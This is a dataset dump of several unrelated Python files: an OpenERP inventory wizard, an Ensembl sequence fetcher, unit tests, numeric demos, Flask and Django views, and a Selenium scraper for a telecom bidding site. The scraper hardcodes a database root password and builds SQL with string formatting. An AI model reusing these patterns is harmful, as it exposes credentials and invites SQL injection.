Parent\") >= 0 and sucursal==2 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if nombre.find(\"SM3 Scrap Parent\") >= 0 and sucursal==3 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if nombre.find(\"SM4 Scrap Parent\") >= 0 and sucursal==4 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if nombre.find(\"SM5 Scrap Parent\") >= 0 and sucursal==5 :\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n if sucursal>5:\n for i in range(rango):\n i=i+1\n if nombre.find(str(i)) >= 0 and sucursal==i:\n location_ids = location_pool.search(cr, uid, [('location_id', 'child_of', [id_tienda])], context=context)\n \n else:\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n },\n 'domain' : {\n 'localizacion_m2o_id' : [( 'id', '=', '0' )],\n 'destino_mov_m2o_id' : [( 'id', '=', '0' )], \n },\n 'warning' : {\n 'title' : '¡Aviso! Seleccione otra tienda',\n 'message' : 'La tienda selecciona no tiene asocida ' +\n 'una localidad virtual de merma, caducado o desperdicio ' +\n '¡Deben crearse primero!',\n } \n } \n \n if location_ids != []:\n #se borra el primer valor de tupla que es el padre de las ubicaciones\n del location_ids[0]\n #Validando el retorno de datos encontrados para el filtrado de datos en destino_mov_m2o_id con etiqueta ubicacion destino\n cadena_retorno = ( str ( \"('id','=','0')\" if ( location_ids == [] ) else ( \"('id','in',\" + str( location_ids ) + \")\" ) ) )\n\n #se escribe el id del almacen\n self.write(cr, uid, ids, {'almacen_m2o_id': id_almacen, },)\n #filtrar ubicaciones de tienda seleccionada \n #Retornando domain\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n # 'filtro_ubicaciones' : cadena_retorno,\n },\n \n 'domain' : {\n 'localizacion_m2o_id' : [\n '&',\n eval( cadena_retorno )\n ],\n 'destino_mov_m2o_id' : [\n '&',\n eval( cadena_retorno )\n ], \n },\t\t\t\n }\n else:\n return {\n 'value' : {\n 'localizacion_m2o_id' : False,\n 'destino_mov_m2o_id' : False,\n },\n 'domain' : {\n 'localizacion_m2o_id' : [( 'id', '=', '0' )],\n 'destino_mov_m2o_id' : [( 'id', '=', '0' )], \n },\n 'warning' : {\n 'title' : '¡Aviso! Seleccione otra tienda',\n 'message' : 'Por favor seleccione solo las tiendas existentes ',\n } \n }\n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def botonAceptar(self, cr, uid, ids,context = { }):\n \"\"\"\n Metodo del botón \"aceptar\" para obtener el almacen de la tienda\n \"\"\"\n datos=self.pool.get( self._name ).browse( cr, uid, ids[0] )\n tienda=datos.almacen_m2o_id.id\n destino=datos.destino_mov_m2o_id.id\n self.write(cr, uid, ids, {\n 'almacen_m2o_id': tienda,\n 'destino_mov_m2o_id': destino,\n 'state': 'producto',\n }, context=context)\n this = self.browse(cr, uid, ids)[0]\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_id': this.id,\n 'views': [(False, 'form')],\n 'res_model': 'merma_wizard_productos',\n 'target': 'new',\n }\n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n def _obtenerIdLogueado( self, cr, uid, ids = None, field_name = None, arg = None, context = None ) :\n \"\"\"\n Función para el campo \"Autor\"\n * Para OpenERP [field.function( empleado_autor )]\n * Argumentos OpenERP: [cr, uid, ids, field_name, arg, context]\n @return dict\n \"\"\"\n result = {}\n for record in self.browse( cr, uid, ids, context ) :\n obj_user = self.pool.get( 'res.users' ).browse( cr, uid, uid )\n nombre_empleado=obj_user.partner_id.name\n result[record.id] = nombre_empleado\n #Retornando los resultados evaluados\n return result\n \n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n def create(self, cr, uid, vals, context = None ):\n \"\"\" \n Método \"create\" que se ejecuta justo antes (o al momento) de CREAR un nuevo registro en OpenERP. \n * Argumentos OpenERP: [cr, uid, vals, context] \n @param \n @return bool \n \"\"\"\n nuevo_id = None\n #Creando la clave siguiente para este registro\n almacen=vals['almacen_m2o_id']\n destino=vals['destino_mov_m2o_id']\n nuevo_id = super( merma_wizard_productos, self ).create( cr, uid, vals, context = context )\n return nuevo_id \n #---------------------------------------------------------------------------------------------------------------------------------------------------\n def _obtener_ubicaciones_subquery( self, cr, uid, ids = None, field_name = None, arg = None, context = None ) :\n \"\"\"\n Función para obtener los id's de los almacenes para poder obtener sus ubicaciones\n * Para OpenERP [field.function( ubicaciones_subquery )]\n * Argumentos OpenERP: [cr, uid, context]\n @return dict\n \"\"\"\n almacenes=[]\n #Se realiza una consulta para filtrar los id de todos los stock de entrada de cada tienda,\n cr.execute(\n \"\"\"\n SELECT\n location_id AS id_local\n from stock_location se\n INNER JOIN stock_warehouse s\n ON s.lot_input_id = se.id\n ORDER BY location_id\n \"\"\"\n )\n for registro in cr.fetchall() :\n almacenes.append( registro[0] )\n \n #Validando el retorno de datos encontrados\n cadena_retorno = (\n str ( \"('id','=','0')\" if ( almacenes == [] ) else ( \"('id','in',\" + str( almacenes ) + \")\" ) )\n )\n #Retornando los id's en caso de ser un \"Registro Nuevo\"\n if ( ( field_name == None ) and ( arg == None ) and ( context == None ) ):\n result = cadena_retorno\n #Retornando los id's en caso de \"Edicion de Registro\"\n else :\n result = {}\n for record in self.browse( cr, uid, ids, context ) :\t\t\n result[record.id] = cadena_retorno\n return result \n #--------------------------------------------------------------------------------------------------------------------------------------------------- \n\n\t### /////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n\t### ###\n\t### Atributos Básicos del Modelo OpenERP ###\n\t### ###\n\t### /////////////////////////////////////////////////////////////////////////////////////////////////////////////// ###\n\n #Nombre del Modelo\n _name = 'merma_wizard_productos'\n #Descripcion\n _description = 'merma_wizard_productos'\n\n _columns = {\n \n # ========================== Campos OpenERP Básicos (integer, char, text, float, etc...) ======================== #\n 'cont':fields.char(\"Contador\", size=10, required=False),\n 'clave_ide' : fields.char( 'Clave de Lista' ),\n 'cod_ean13':fields.char(\"Código Producto\", size=13, required=False),\n 'cod_ubicacion':fields.char(\"Código Ubicación\", size=13, required=False),\n 'muestra_destino':fields.char(\"Destino\", required=False),\n 'muestra_localizacion':fields.char(\"Localizacion\", required=False),\n 'producto': fields.char('Nombre', size=80, readonly=True),\n 'imagen': fields.binary( 'Imagen', readonly=True, help='photo'),\n 'state': fields.selection([\n ('tienda', ' Tienda'),\n ('producto', 'Producto'),\n ('guardar', 'Guardar')\n ]),\n # 'filtro_ubicaciones':fields.text(\"Lista\", required=False),\n 'cantidad_prod':fields.float('Cantidad de Producto', required=False),\n 'cantidad_mover':fields.float('Cantidad a Mover', required=False),\n 'unidad_med':fields.char(\"Unidad de Medida\", required=False),\n 'precio':fields.float('Precio', required=False),\n # ====================================== Relaciones OpenERP [one2many](o2m) ====================================== #\n\n 'almacen_m2o_id': fields.many2one(\n 'stock.warehouse',\n 'Tienda'\n ),\n\n 'destino_mov_m2o_id': fields.many2one(\n 'stock.location',\n 'Ubicacion Destino'\n ),\n \n 'localizacion_m2o_id': fields.many2one(\n 'stock.location',\n 'Localización'\n ),\n \n 'producto_m2o_id': fields.many2one(\n 'product.product',\n 'Id Producto'\n ),\n \n 'medida_m2o_id': fields.many2one('product.uom', 'Unidad de Medida'),\n \n # ====================================== Function ====================================== # \n 'empleado_autor' : fields.function(\n _obtenerIdLogueado,\n type = 'text',\n method = True,\n string = 'Autor',\n change_default = True,\n store = False,\n readonly = True,\n required = False\n ),\n #Campos function para definir el domain del campo almacen_id (no se almacena)\n 'ubicaciones_subquery' : fields.function(\n _obtener_ubicaciones_subquery,\n type = 'text',\n method = True,\n string = 'SubqueryUbicaciones',\n change_default = True,\n store = False,\n readonly = True,\n required = False\n ),\n \n }\n\n #Valores por defecto de los elementos del arreglo [_columns]\n _defaults = {\n 'state': 'tienda',\n }\n \n #Reestricciones desde código\n _constraints = [ ]\n\n #Reestricciones desde BD\n _sql_constraints = [ ]\n\nmerma_wizard_productos()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"python/alicia/sm_merma/secciones/wizard_productos/merma_wizard_productos.py","file_name":"merma_wizard_productos.py","file_ext":"py","file_size_in_byte":33847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616613038","text":"import requests, sys\nimport argparse as ap \nfrom Bio import SeqIO\nfrom pathlib import Path\n\ndef parse_arguments(parser=None): \n '''Parsers for chromosome, start and end coordinates, \n assumign we're doing human sequences. '''\n if not parser: \n parser = ap.ArgumentParser()\n \n parser = ap.ArgumentParser(description=__doc__)\n parser.add_argument(\"chromosome\",\n help=\"Chromosome number of the sequence\")\n parser.add_argument(\"seq_start\", type=int, \n help=\"start coordinate\")\n parser.add_argument(\"seq_stop\", \n type=int, help=\"end coordinate\")\n args = parser.parse_args()\n\n return args\n\n\ndef seq_retriever(args):\n '''Accessing the Ensembl-REST API to retrieve \n the sequences with the arguments we take \n from the command line. ''' \n\n server = \"https://rest.ensembl.org\"\n ext = f\"/sequence/region/human/{args.chromosome}: \\\n {args.seq_start}..{args.seq_stop}:1?\"\n print(\"Retrieving sequence...\")\n r = requests.get(server+ext, \n headers={\"Content-Type\" : \"text/plain\"})\n\n if not r.ok: \n r.raise_for_status()\n sys.exit()\n\n return r.text\n\ndef seq_writer(r_text, args): \n '''Input the directory where the file needs to go.''' \n print(\"Writing sequence to file...\") \n with open(\"seq_file.fasta\", \"w\") as f: \n # Write the header file. \n f.write(f\">human | {args.chromosome} | {args.seq_start} to {args.seq_stop}\\n\")\n # Formatted text sequence. \n for i in range(0, len(r_text), 80): \n if r_text[i] != None: \n f.write(f\"{r_text[i : i + 80]}\\n\")\n print(\"\\nFile written to seq_file.fasta\")\n\n\ndef main(): \n print(\"Sequence address taken.\\nStarting sequence retrieval...\")\n args = parse_arguments()\n r_text = seq_retriever(args)\n seq_writer(r_text, args)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/seqio1.py","file_name":"seqio1.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"140498105","text":"import os\nimport tempfile\nimport unittest\n\nfrom kg_covid_19.transform_utils.drug_central.drug_central import \\\n parse_drug_central_line, unzip_and_get_tclin_tchem, tsv_to_dict\nfrom kg_covid_19.utils.transform_utils import parse_header\nfrom parameterized import parameterized\n\n\nclass TestDrugCentral(unittest.TestCase):\n\n def setUp(self) -> None:\n self.dti_fh = open(\n 'tests/resources/drug_central/drug.target.interaction_SNIPPET.tsv', 'rt')\n\n @parameterized.expand([\n ('STRUCT_ID', '4'),\n ('TARGET_NAME', 'Sodium channel protein type 4 subunit alpha'),\n ('TARGET_CLASS', 'Ion channel'),\n ('ACCESSION', 'P35499'),\n ('GENE', 'SCN4A'),\n ('SWISSPROT', 'SCN4A_HUMAN'),\n ('ACT_VALUE', ''),\n ('ACT_UNIT', ''),\n ('ACT_TYPE', ''),\n ('ACT_COMMENT', ''),\n ('ACT_SOURCE', 'WOMBAT-PK'),\n ('RELATION', ''),\n ('MOA', '1'),\n ('MOA_SOURCE', 'CHEMBL'),\n ('ACT_SOURCE_URL', ''),\n ('MOA_SOURCE_URL', 'https://www.ebi.ac.uk/chembl/compound/inspect/CHEMBL1200749'),\n ('ACTION_TYPE', 'BLOCKER'),\n ('TDL', 'Tclin'),\n ('ORGANISM', 'Homo sapiens')])\n def test_parse_drug_central_line(self, key, value):\n header = parse_header(self.dti_fh.readline())\n line = self.dti_fh.readline()\n parsed = parse_drug_central_line(line, header)\n self.assertTrue(key in parsed)\n self.assertEqual(value, parsed[key])\n\n @parameterized.expand([\n ('tclin', 'tests/resources/drug_central/tclin_SNIPPET.tsv', 2, 'Q13131', 'drug_name', 'cepharanthine'),\n ('tchem', 'tests/resources/drug_central/tchem_SNIPPET.tsv', 2, 'P21917', 'drug_name', 'brexpiprazole'),\n ])\n def test_tsv_to_dict(self, name, file, expected_rows, test_key, sub_key, test_val) -> None:\n ret_val = tsv_to_dict(file, 'uniprot')\n self.assertTrue(isinstance(ret_val, dict))\n self.assertEqual(len(ret_val), expected_rows)\n self.assertTrue(isinstance(ret_val, dict))\n self.assertTrue(test_key in ret_val)\n self.assertTrue(sub_key in ret_val.get(test_key))\n self.assertEqual(ret_val[test_key][sub_key], test_val)\n\n def test_unzip_and_get_tclin_tchem(self) -> None:\n zip_file = \"tests/resources/drug_central/test.zip\"\n tempdir = tempfile.mkdtemp()\n (tclin, tchem) = unzip_and_get_tclin_tchem(zip_file, tempdir)\n self.assertTrue(isinstance(tclin, str))\n self.assertTrue(isinstance(tchem, str))\n self.assertEqual(tclin, os.path.join(tempdir, 'tclin_05122020.tsv'))\n self.assertEqual(tchem, os.path.join(tempdir, 'tchem_drugs_05122020.tsv'))\n\n","sub_path":"tests/test_drug_central.py","file_name":"test_drug_central.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"502294130","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as norm\nimport matplotlib.ticker as ticker\nimport math \n\n\ndef p(N,e,t,a,b):\n n=N\n S=[]\n E=[]\n ecount=0\n Ebar = []\n std = 0\n \n while True:\n for i in range(5):\n S=np.random.uniform(a,b,n) \n sum=0.0\n for x in S:\n sum = sum + math.exp(t*x)\n \n E.append(float(sum)/float(n))\n else:\n std = np.std(E)\n if(std arrow.utcnow():\n raise ValidationError(\n \" you can not generate future report\"\n )\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"report/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"362839255","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 9 16:07:38 2017\n\n@author: Master Chief\n\"\"\"\n\nimport scipy as sp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as font_manager\n\nfont_path = 'C:\\Windows\\Fonts\\consola.ttf'\nfont_prop = font_manager.FontProperties(fname=font_path, size=10)\n\ntitle_font = {'fontname':'Arial', 'size':'16', 'color':'black', 'weight':'normal',\n 'verticalalignment':'bottom'}\n\nfont = {'fontname':'Comic Sans MS','fontsize':14}\n\n# Creamos un polinomio\npolinomio = [1.,-6.4,6.45,20.538,-31.752] # polinomio = x^4 - 6.4 x^3 + 6.45 x^2 + 20.538 x - 31.752\n\n\ndef buscaraiz(f,a,b,dx):\n x1 = a; f1 = f(a)\n x2 = a + dx; f2 = f(x2)\n while f1*f2 > 0.0:\n if x1 >= b: return None#,None\n x1 = x2; f1 = f2\n x2 = x1 + dx; f2 = f(x2)\n else:\n return x1,x2\n \n\ndef p(x):\n y = x**3 - 10 * x**2 + 5\n return y\n\nx = np.linspace(-1,1.5,100)\n\na, b, dx = (-1.,0, 0.2)\n\nx1, x2 = buscaraiz(p,a,b,dx)\n\nraiz=sp.optimize.bisect(p, x1, x2)\nprint(raiz)\n\nplt.plot(raiz,0,'bo', label='raíz estimada')\nplt.plot(x,p(x), label='$x^{3} - 10 * x^{2} + 5$')\nplt.axhline(y=0, lw=0.7, ls='dashed')\nplt.axvline(x=0, lw=0.7, ls='dashed')\nplt.axis([-1,1.5,-7.5,6])\nplt.title('Se desea calcular las raíces de esta función',**font)\nplt.legend(loc=1)\nplt.show()\n#print(raices)","sub_path":"Tema 2 - Operaciones matematicas basicas/Codigos python/03 Raices/raices_python_scipy_02.py","file_name":"raices_python_scipy_02.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522867605","text":"# coding=utf-8\nfrom django.shortcuts import get_object_or_404\nfrom .models import Profile\n\n\ndef profile(request):\n \"\"\"Получает данные пользователя.\"\"\"\n user = request.user\n if user.is_active:\n profile = get_object_or_404(Profile, user_id=user.id)\n return {\n 'user_name': user.username,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'email': user.email,\n 'avatar': profile.avatar,\n 'phone': profile.phone,\n 'city': profile.city,\n 'sex': profile.sex,\n 'birthday': profile.birthday\n }\n else:\n return {\n 'user_name': 'Аноним',\n 'avatar': None\n }\n","sub_path":"src/gorodkirov/users/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355322291","text":"\n# ======================================================\n# @Author : Daniel                 \n# @Time : 2020.6.20\n# @Desc : 用户视图\n# ======================================================\n\nfrom flask import request, render_template, redirect, url_for\nfrom utils.check_login import is_login\nfrom .models import Role\nfrom .user_views import user_bp\n\n\n@user_bp.route('/role/', methods=['GET'])\n@is_login\ndef role_list():\n \"\"\"\n 角色信息列表\n :return:\n \"\"\"\n if request.method == 'GET':\n # 第几页\n page = int(request.args.get('page', 1))\n # 每页的数据\n page_num = int(request.args.get('page_num', 10))\n # 查询当前第几页的多少条数据\n paginate = Role.query.order_by('r_id').paginate(page, page_num)\n\n # 获取某页的具体数据\n roles = paginate.items\n\n return render_template('role/role_list.html', roles=roles, paginate=paginate)\n\n\n@user_bp.route('/role_edit/', methods=['GET', 'POST'])\n@is_login\ndef edit_role():\n \"\"\"\n 添加编辑角色\n :return:\n \"\"\"\n if request.method == 'GET':\n r_id = request.args.get('r_id', None)\n\n if r_id:\n role = Role.query.get(r_id=int(r_id))\n else:\n role = None\n\n return render_template('role/role_edit.html', role=role)\n\n if request.method == 'POST':\n r_name = request.form['r_name']\n\n if 'r_id' in request.form and request.form['r_id']:\n role = Role.query.get(r_id=int(request.form['r_id']))\n role.r_name = r_name\n\n else:\n r = Role.query.filter_by(r_name=r_name).first()\n\n if r:\n msg = '角色名称不能重复!!'\n\n return render_template('role/role_edit.html', msg=msg)\n\n role = Role(name=r_name)\n\n role.save()\n\n # 重定向到 roles_list 方法\n return redirect(url_for('user.role_list'))","sub_path":"App/role_views.py","file_name":"role_views.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"104628044","text":"import os, time, re, redis, pymysql,time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom lxml import etree\r\nfrom city_data import get_city_dict\r\nfrom Regular_Expression import regularExpression\r\n\r\n# os.system('cd /Users/杰/AppData/Local/Google/Chrome/Application')\r\n# os.system('chrome.exe --remote-debugging-port=9222 -user-data-dir=\"c:/selenium/automationprofile\"')\r\n\r\nclass China_unicom(object):\r\n\tdef __init__(self):\r\n\t\tself.city_dict = get_city_dict()\r\n\t\tself.pattern01 = r'服务区域:(.*?)<'\r\n\t\tself.pattern02 = r'服务地点:(.*?)<'\r\n\t\tself.pattern03 = r'服务地址:(.*?)<'\r\n\t\tself.pattern04 = r'采.*?购.*?人(.*?)<'\r\n\t\tself.pattern05 = r'比.*?选.*?人:(.*?)<'\r\n\t\tself.pattern08 = r'地址:(.*?)<'\r\n\t\tself.pattern06 = r'联系地址:(.*?)<'\r\n\t\tself.pattern07 = r'详细地址:(.*?)<'\r\n\t\t# 正则表达式的规则列表\r\n\t\tself.pattern_list = [self.pattern01, self.pattern02, self.pattern03, self.pattern04, self.pattern08, self.pattern05, self.pattern06, self.pattern07]\r\n\t\t# self._arguments = []\r\n\t\tself.base_url = 'http://www.chinaunicombidding.cn'\r\n\t\tself.chrome_options = Options()\r\n\t\t# chrome_options.add_experimental_option(\"debuggerAddress\",\"127.0.0.1:9222\")\r\n\t\tself.chrome_options.add_argument('disable-infobars')\r\n\t\tself.chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n\t\t# self.option = webdriver.ChromeOptions()\r\n\t\tself.going_to_crawl_bid = '{}&type=1'\r\n\t\tself.going_to_crawl_result = '{}&type=2'\r\n\t\tself.going_to_crawl_single = '{}&type=3'\r\n\t\tself.duplicate_part = 'http://www.chinaunicombidding.cn/jsp/cnceb/web/info1/infoList.jsp?page='\r\n\r\n\t\tself.conn = pymysql.connect(host='0.0.0.0',\r\n\t\t\t\t\t\t\t\t\tuser='root',\r\n\t\t\t\t\t\t\t\t\tpassword='jiayou875',\r\n\t\t\t\t\t\t\t\t\tdatabase='zb_data',\r\n\t\t\t\t\t\t\t\t\t# database='test_demo',\r\n\t\t\t\t\t\t\t\t\tport=3306,\r\n\t\t\t\t\t\t\t\t\tcharset='utf8')\r\n\t\tself.cur = self.conn.cursor()\r\n\r\n\t\tpool = redis.ConnectionPool(host='0.0.0.0', port=6379, db=15)\r\n\t\tself.r = redis.Redis(connection_pool=pool)\r\n\t\t# 转换成localtime\r\n\t\tnow_time = '%.0f' % time.time()\r\n\t\ttime_local = time.localtime(int(now_time))\r\n\t\t# 转换成新的时间格式(2016-05-05 20:28:54)\r\n\t\t# dt = time.strftime(\"%Y-%m-%d %H:%M:%S\",time_local)\r\n\t\tself.dt = time.strftime(\"%Y-%m-%d\", time_local)\r\n\r\n\r\n\tdef upload_items(self, items):\r\n\t\tif items['addr_id'] == '':\r\n\t\t\titems['addr_id'] = '100'\r\n\t\ttry:\r\n\t\t\tif items['addr_id'] != '' and items['title'] != '' and items['url'] != '' and items['intro'] != '' and items[\r\n\t\t\t\t'web_time'] != '':\r\n\t\t\t\titems['web_time'] = int(time.mktime(time.strptime(items['web_time'], \"%Y-%m-%d\")))\r\n\t\t\t\t# 正式上传到服务器\r\n\t\t\t\tsql = \"INSERT INTO ztb_py_data (catid,title,style,addtime,adddate,areaid,linkurl,content) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');\" % (\r\n\t\t\t\t\titems['type_id'], items['title'], items['source_name'], items['time'], items['web_time'],\r\n\t\t\t\t\titems['addr_id'],\r\n\t\t\t\t\titems['url'], pymysql.escape_string(items['intro']))\r\n\t\t\t\ttime.sleep(0.1)\r\n\t\t\t\tself.cur.execute(sql)\r\n\t\t\t\tself.conn.commit()\r\n\t\t\t\tself.r.hincrby(self.dt, items['source_name'])\r\n\r\n\t\t\t\t# 单机测试\r\n\t\t\t\t# sql = \"INSERT INTO winkboy (catid,title,style,addtime,adddate,areaid,linkurl,content) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');\" % ( items['type_id'], items['title'], items['source_name'], items['time'], items['web_time'], items['addr_id'], items['url'], pymysql.escape_string(items['intro']))\r\n\t\t\t\t# self.cur.execute(sql)\r\n\t\t\t\t# self.conn.commit()\r\n\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\titems['web_time'] = int(time.mktime(time.strptime(items['web_time'], \"%Y-%m-%d\")))\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\r\n\t\t\t\tsql = \"INSERT INTO ztb_error_infos (catid,title,style,addtime,adddate,areaid,status,linkurl,content) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');\" % (\r\n\t\t\t\t\titems['type_id'], items['title'], items['source_name'], items['time'], items['web_time'],\r\n\t\t\t\t\titems['addr_id'], 3, items['url'], pymysql.escape_string(items['intro']))\r\n\t\t\t\tself.cur.execute(sql)\r\n\t\t\t\tself.conn.commit()\r\n\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\"数据上传失败\")\r\n\t\t\tprint(items['title'])\r\n\t\t\tprint(items['url'])\r\n\t\t\tprint(e)\r\n\r\n\r\n\tdef get_response(self, resource, driver):\r\n\t\tlist_content = etree.HTML(resource)\r\n\t\tlist_url = list_content.xpath('//div[@id=\"div1\"]//tr[@height=\"35px\"]')\r\n\t\tprint(len(list_url))\r\n\t\tif len(list_url) == 0:\r\n\t\t\tpass\r\n\t\tfor each_tr in list_url[:]:\r\n\t\t\titems = {}\r\n\t\t\titems['intro'] = ''\r\n\t\t\titems['addr_id'] = ''\r\n\t\t\titems['title'] = ''\r\n\t\t\titems['url'] = ''\r\n\t\t\titems['web_time'] = ''\r\n\t\t\titems[\"time\"] = '%.0f' % time.time()\r\n\r\n\t\t\titems['title'] = each_tr.xpath('.//span/@title')[0].strip()\r\n\r\n\t\t\t# 获取文章id、然后使用网页前缀拼接文章id获取到文章的真实id\r\n\t\t\tarticle_url = each_tr.xpath('.//span/@onclick')[0]\r\n\t\t\titems['url'] = self.base_url + re.search(r'window.open\\(\"(.*?)\",\"\",', article_url, re.S).group(1)\r\n\t\t\tprint(items['url'])\r\n\t\t\tjs = \"window.open({})\".format('\"' + items['url'] + '\"') # 可以看到是打开新的标签页 不是窗口\r\n\t\t\t# print(js)\r\n\t\t\ttime.sleep(0.01)\r\n\t\t\tSucess = True\r\n\t\t\t# while Sucess:\r\n\t\t\t# \ttry:\r\n\t\t\t# \t\tdriver.execute_script(js)\r\n\t\t\t# \t\tdriver.implicitly_wait(30)\r\n\t\t\t# \t\tSucess = False\r\n\t\t\t# \texcept:\r\n\t\t\t# \t\tdriver.switch_to_window(3)\r\n\t\t\t# \t\tdriver.refresh()\r\n\t\t\t# time.sleep(2.5)\r\n\t\t\ttry:\r\n\t\t\t\tdriver.execute_script(js)\r\n\t\t\t\tdriver.implicitly_wait(30)\r\n\t\t\texcept:\r\n\t\t\t\tdriver.switch_to_window(3)\r\n\t\t\t\tdriver.refresh()\r\n\t\t\tnow_handle = driver.current_window_handle\r\n\t\t\t# print(driver.window_handles, now_handle)\r\n\t\t\tdriver.switch_to_window(driver.window_handles[driver.window_handles.index(now_handle) + 1])\r\n\t\t\t# 获取日期\r\n\t\t\titems['web_time'] = each_tr.xpath('.//td/following-sibling::td/text()')[0].strip()\r\n\t\t\t# 获取到地址然后通过城市表获取城市id\r\n\t\t\ttry:\r\n\t\t\t\titems['address'] = each_tr.xpath('.//td[3]/text()')[0].strip()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\t\tdirty_article = driver.page_source\r\n\t\t\t# print(dirty_article)\r\n\t\t\ttry:\r\n\t\t\t\t# print(1111111)\r\n\t\t\t\ttime.sleep(0.01)\r\n\t\t\t\tdirty_article = re.search(r'(.*?)',str(dirty_article), re.S).group(1)\r\n\t\t\t\tdirty_article = re.sub(r'href=\"', 'href=\"http://www.chinaunicombidding.cn', dirty_article, flags = re.S)\r\n\t\t\t\tdirty_article = re.sub(r'.*?', '', dirty_article, flags = re.S)\r\n\t\t\t\t# print(2222222)\r\n\t\t\t\t# 将文章的垃圾数据进行清洗\r\n\t\t\t\tclean_article = re.sub(regularExpression, ' ', dirty_article)\r\n\t\t\t\titems[\"intro\"] = clean_article\r\n\t\t\t\t# print(items[\"intro\"])\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\t\t\t\tpass\r\n\r\n\t\t\t# 如果标题出现失败、基本可以证明是失败公示、所以将其纳入38257\r\n\t\t\tif '中标' in items['title'] or '成交' in items['title'] or '结果' in items['title'] or '失败' in items['title'] or '流标' in items['title'] or '候选人' in items['title'] or '中选人' in items['title'] or '作废' in items['title'] or '终止' in items['title']:\r\n\t\t\t\titems['type_id'] = '38257'\r\n\t\t\telif '更正' in items['title'] or '变更' in items['title'] or '答疑' in items['title'] or '澄清' in items['title'] or '补充' in items['title'] or '延期' in items['title']:\r\n\t\t\t\titems['type_id'] = '38256'\r\n\t\t\telse:\r\n\t\t\t\titems['type_id'] = '38255'\r\n\r\n\t\t\ttry:\r\n\t\t\t\tfor each_city in self.city_dict:\r\n\t\t\t\t\tif each_city in items['address']:\r\n\t\t\t\t\t\titems['addr_id'] = self.city_dict[each_city]\r\n\t\t\t\t\t\tbreak\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\t\t\t# 如果从地址栏找不到地址 则从标题获取\r\n\t\t\tif items['addr_id'] == '':\r\n\t\t\t\tfor each_city in self.city_dict:\r\n\t\t\t\t\tif each_city in items['title']:\r\n\t\t\t\t\t\titems['addr_id'] = self.city_dict[each_city]\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\tif items['addr_id'] == '':\r\n\t\t\t\tfor each_pattern in self.pattern_list:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tsearch_text = re.search(each_pattern, dirty_article, re.S).group(1)\r\n\t\t\t\t\t\tfor city_name in self.city_dict:\r\n\t\t\t\t\t\t\tif city_name in search_text:\r\n\t\t\t\t\t\t\t\titems['addr_id'] = self.city_dict[city_name]\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\tif items['addr_id'] != '':\r\n\t\t\t\t\t\tbreak\r\n\t\t\titems[\"source_name\"] = '中国联通采购与招标网'\r\n\t\t\tself.upload_items(items)\r\n\t\t\t# print(items['title'])\r\n\t\t\tdriver.close()\r\n\t\t\ttime.sleep(0.01)\r\n\t\t\tdriver.switch_to_window(driver.window_handles[driver.window_handles.index(now_handle)])\r\n\t\t\t# break\r\n\r\n\tdef crawl_first_page(self, driver):\r\n\t\tdriver.get('http://www.chinaunicombidding.cn/jsp/cnceb/web/info1/infoList.jsp?page=1&type=1')\r\n\t\tdriver.implicitly_wait(25)\r\n\t\tself.get_response(driver.page_source, driver)\r\n\r\n\tdef run(self):\r\n\t\tall_list_pages = []\r\n\t\tall_list_pages.extend([self.going_to_crawl_bid.format(i) for i in range(1, 20)])\r\n\t\tall_list_pages.extend([self.going_to_crawl_result.format(i) for i in range(1, 